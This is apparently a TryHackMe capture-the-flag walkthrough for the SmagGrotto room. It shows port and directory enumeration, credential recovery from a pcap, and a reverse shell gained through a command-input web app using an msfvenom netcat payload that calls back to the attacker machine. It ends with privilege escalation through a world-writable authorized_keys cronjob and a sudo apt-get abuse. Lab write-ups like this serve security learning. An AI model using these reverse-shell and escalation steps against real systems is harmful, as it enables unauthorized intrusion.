I'll be going over an easy level CTF on TryHackMe: SmagGrotto:
Scanning & Enumeration
As always, we begin with enumerating the machine ports and services. I use my personal script to obtain the ports with Threader3000 and then scan the open ones with nmap (although I believe the latest Threader3000 now feeds the open ports into nmap for you)
nmap -T4 -Pn -p22,80 -A {ip}Enumerating Services
Port 22- ssh
Even though ssh is open, I leave that alone for now as I probably won't be able to exploit it.
Port 80: http
This is our only other option, so let's check it out.
There's nothing interesting on the homepage, so let's try some directory busting:
You can use any tool you like, I like dirsearch because of the speed.
python3 /opt/dirsearch/dirsearch.pu -u 10.10.221.182 -e * -rWe have an interesting finding with 'mail', so let's check that out now:
On the mail page, we see it talking about downloading stuff, so I tried to download the pcap seen in the post simply by clicking on the file that I see there and I was able:
Opening that downloaded pcap file in wireshark we see this:
In the pcap there's an interesting packet that's making a POST request to 'login.php'. To make it easier to look at, I follow the HTTP stream, which you do like this (right click on the desired packet):
After following the stream, we see some plaintext credentials, as well as what looks like a subdomain in 'development.smag.thm':
Vulnerable WebApp
In order to visit a subdomain, we must first add it to our /etc/hosts file so the name can be resolved to the IP:
Once we've done that we can go out to the site:
It's just a file system, but if you remember from the pcap, those credentials were actually from /login.php, so let's check that out:
Just a typical login screen, as I expected. Trying the credentials we found we're able to log in. Once logged in, we see a field to simply input commands. After trying bash and python reverse shells with no luck, I tried a netcat one, and was able to gain access! To create a netcat reverse shell you can use msfvenom, with this syntax:
msfvenom -p cmd/unix/reverse_tcp lhost=attack_machine_ip lport=4444 RSetting up a listener on the port selected above and then shooting off that command in the app's prompt, we get our reverse shell:
Once I have access, I do my usual commands to gain a fully interactive tty shell:
python3 -c "import pty;pty.spawn('/bin/bash')"
ctrl+z
stty raw -echo
fg
fg
export TERM=xterm-256color
Getting User
Once I was on the machine as www-data, I checked to see if I had access to anything from the user, but had no luck. So I enumerated a bit, and found this running as cronjob:
What it seems to be doing is taking a public rsa key, and puts it into the authorized keys file for the user. Knowing this, we can generate our own rsa key pair, give the public key to that backup file, and then ssh in with the private key that we generated. The first thing we have to check is whether or not we have write permissions to that file. If we do, we're golden, if not, then this privesc won't work:
Navigating to the directory we see that everyone has read/write permissions to the file referenced in the cronjob, so we should be good to go! Moving forward with the steps I laid out earlier:
You can generate an rsa key pair as shown above. I then replaced the file on the target machine with the public key I just generated:
Once that was set up, I waited a minute for the cronjob to execute and then tried ssh-ing in with the private key I had generated:
And we are the user! Let's grab that flag:
Privesc to Root
For the final privesc to root, I basically started the enumeration process all over again, this time starting with checking my sudo privileges:
We can do something running sudo. Checking out the amazing website gtfobins I found that apt-get indeed has an entry. Following the steps laid out by gtfobins, I'm able to escalate my privileges to root!
Bonus
That's all for now, thanks a bunch to @jakeyee on discord, as this was his box. This was a very fun boot2root!
If there are any questions or feedback at all on the walkthrough or anything I did, or anything at all, feel free to reach out to me on the THM website or their discord server under the name @bobloblaw#9228!
That's all for now, thanks for reading :)
Comments